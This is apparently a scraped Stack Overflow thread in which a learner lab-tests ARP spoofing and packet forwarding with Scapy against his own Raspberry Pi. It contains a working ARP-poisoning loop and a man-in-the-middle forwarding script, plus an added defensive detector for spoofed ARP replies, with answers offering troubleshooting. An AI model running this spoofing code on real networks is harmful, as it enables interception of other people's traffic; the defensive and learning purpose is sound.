Scapy forwarding packages

你离开我真会死。 Submitted on 2019-12-10 10:05:53

Question


I'm just learning Python with Scapy. I read and use the book "Network Hacks - Intensivkurs - Angriff und Verteidigung mit Python" (German).

I would like to try a man-in-the-middle attack by using ARP spoofing. I have my computer, the victim (my Raspberry Pi) and the standard gateway.

For the spoofing, I use a code snippet from the book:

#!/usr/bin/python

import sys
import time
from scapy.all import sniff, sendp, ARP, Ether

if len(sys.argv) < 3:
    print sys.argv[0] + " <target> <spoof_ip>"
    sys.exit(0)

iface = "wlan1"
target_ip = sys.argv[1]
fake_ip = sys.argv[2]

ethernet = Ether()
arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")
packet = ethernet / arp

while True:
    sendp(packet, iface=iface)
    time.sleep(10)

It works; my victim shows my MAC as the gateway. The victim sends packets with the correct IP but my MAC address. Now the victim should open a website (wget http://example.com) and I want to use Wireshark to read the traffic. But I have to redirect the packets (DNS and TCP/HTTP). I tried it with this code:

#!/usr/bin/python

from scapy.all import *
import sys

iface = "wlan1"
filter = "ip"
VICTIM_IP = "192.168.2.108"
MY_IP = "192.168.2.104"
GATEWAY_IP = "192.168.2.1"
VICTIM_MAC = "### don't want so show###"
MY_MAC = "### don't want so show###"
GATEWAY_MAC = "### don't want so show###"

def handle_packet(packet):
    if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
        packet[Ether].dst = GATEWAY_MAC
        sendp(packet)

        print "A packet from " + packet[IP].src + " redirected!"

sniff(prn=handle_packet, filter=filter, iface=iface, store=0)

Wireshark shows a packet with the correct data (IP Source = Victim IP, IP Destination = Gateway IP, MAC Source = Victim MAC, MAC Destination = Gateway MAC). The gateway is a DSL router, so it is also a "DNS server".

But my Raspberry doesn't receive a DNS response. What's my fault?

Yours faithfully,

MatStorm
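
Seen from the host being targeted, the repeated `is-at` replies sent by the first script in the question are detectable: they answer no request, and they rebind the gateway IP to a different MAC. The following is an added example, not code from the original post or the book. `ArpWatch`, `parse_arp`, `build_arp` and `demo` are hypothetical names, the MAC addresses are constructed, and the IP addresses reuse the ones in the question. It assumes raw Ethernet frames captured on the protected host.

```python
import socket
import struct

ARP_IPV4_HDR = b"\x08\x06\x00\x01\x08\x00\x06\x04"  # EtherType ARP, Ethernet, IPv4, hlen 6, plen 4
OP_REQUEST, OP_REPLY = 1, 2  # who-has / is-at

def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_ip), or None if not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or frame[12:20] != ARP_IPV4_HDR:
        return None
    op, sha, spa, _tha, tpa = struct.unpack("!H6s4s6s4s", frame[20:42])
    return op, sha.hex(":"), socket.inet_ntoa(spa), socket.inet_ntoa(tpa)

class ArpWatch:
    def __init__(self):
        self.bindings = {}    # ip -> first MAC seen claiming it
        self.pending = set()  # (asker_ip, asked_ip) for unanswered who-has

    def feed(self, frame):
        """Process one Ethernet frame and return a list of alert strings."""
        parsed = parse_arp(frame)
        if parsed is None:
            return []
        op, mac, ip, target = parsed
        alerts = []
        if op == OP_REQUEST:
            self.pending.add((ip, target))
        elif op == OP_REPLY:
            if (target, ip) in self.pending:
                self.pending.discard((target, ip))
            else:
                alerts.append("unsolicited is-at: %s at %s" % (ip, mac))
        known = self.bindings.setdefault(ip, mac)
        if known != mac:
            alerts.append("binding change: %s was %s, now %s" % (ip, known, mac))
        return alerts

def build_arp(op, sha, spa, tha, tpa):
    """Constructed sample frame: MACs as 6 raw bytes, IPs as dotted strings."""
    return (tha + sha + ARP_IPV4_HDR + struct.pack("!H", op)
            + sha + socket.inet_aton(spa) + tha + socket.inet_aton(tpa))

def demo():
    """Constructed traffic: who-has, genuine is-at, then a second MAC claiming the gateway IP."""
    gw, victim, other = (bytes.fromhex("0200000000" + x) for x in ("01", "08", "04"))
    w = ArpWatch()
    return [w.feed(f) for f in (
        build_arp(OP_REQUEST, victim, "192.168.2.108", bytes(6), "192.168.2.1"),
        build_arp(OP_REPLY, gw, "192.168.2.1", victim, "192.168.2.108"),
        build_arp(OP_REPLY, other, "192.168.2.1", victim, "192.168.2.108"))]
```

`demo()` returns one alert list per frame; only the third frame raises alerts. The tracker keeps the first binding it saw, so every repeat of the conflicting reply alerts again.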


Answer 1:


One thing Scapy does not do for you is handle firewall issues; in this situation you would be well served to turn off the host firewall on your attacking host. The packets you're crafting aren't using the usual path for packets.

Also, are you translating the source address when you forward the packets on so that the response comes to you? I don't see that in the code...




Answer 2:


Check if monitor mode is on the fake DNS server interface. I cannot see from your code if that is done, so just a quick tip. I will look closer after some sleep, when I can see straight. When I did spoofing last time, I had 1 Ethernet cable with internet in the router and monitor mode on wlan. If I tried without it, it showed some wanted info but just not right; I can't remember for sure what I did to fix it. Best of luck.



Source: https://stackoverflow.com/questions/21912854/scapy-forwarding-packages
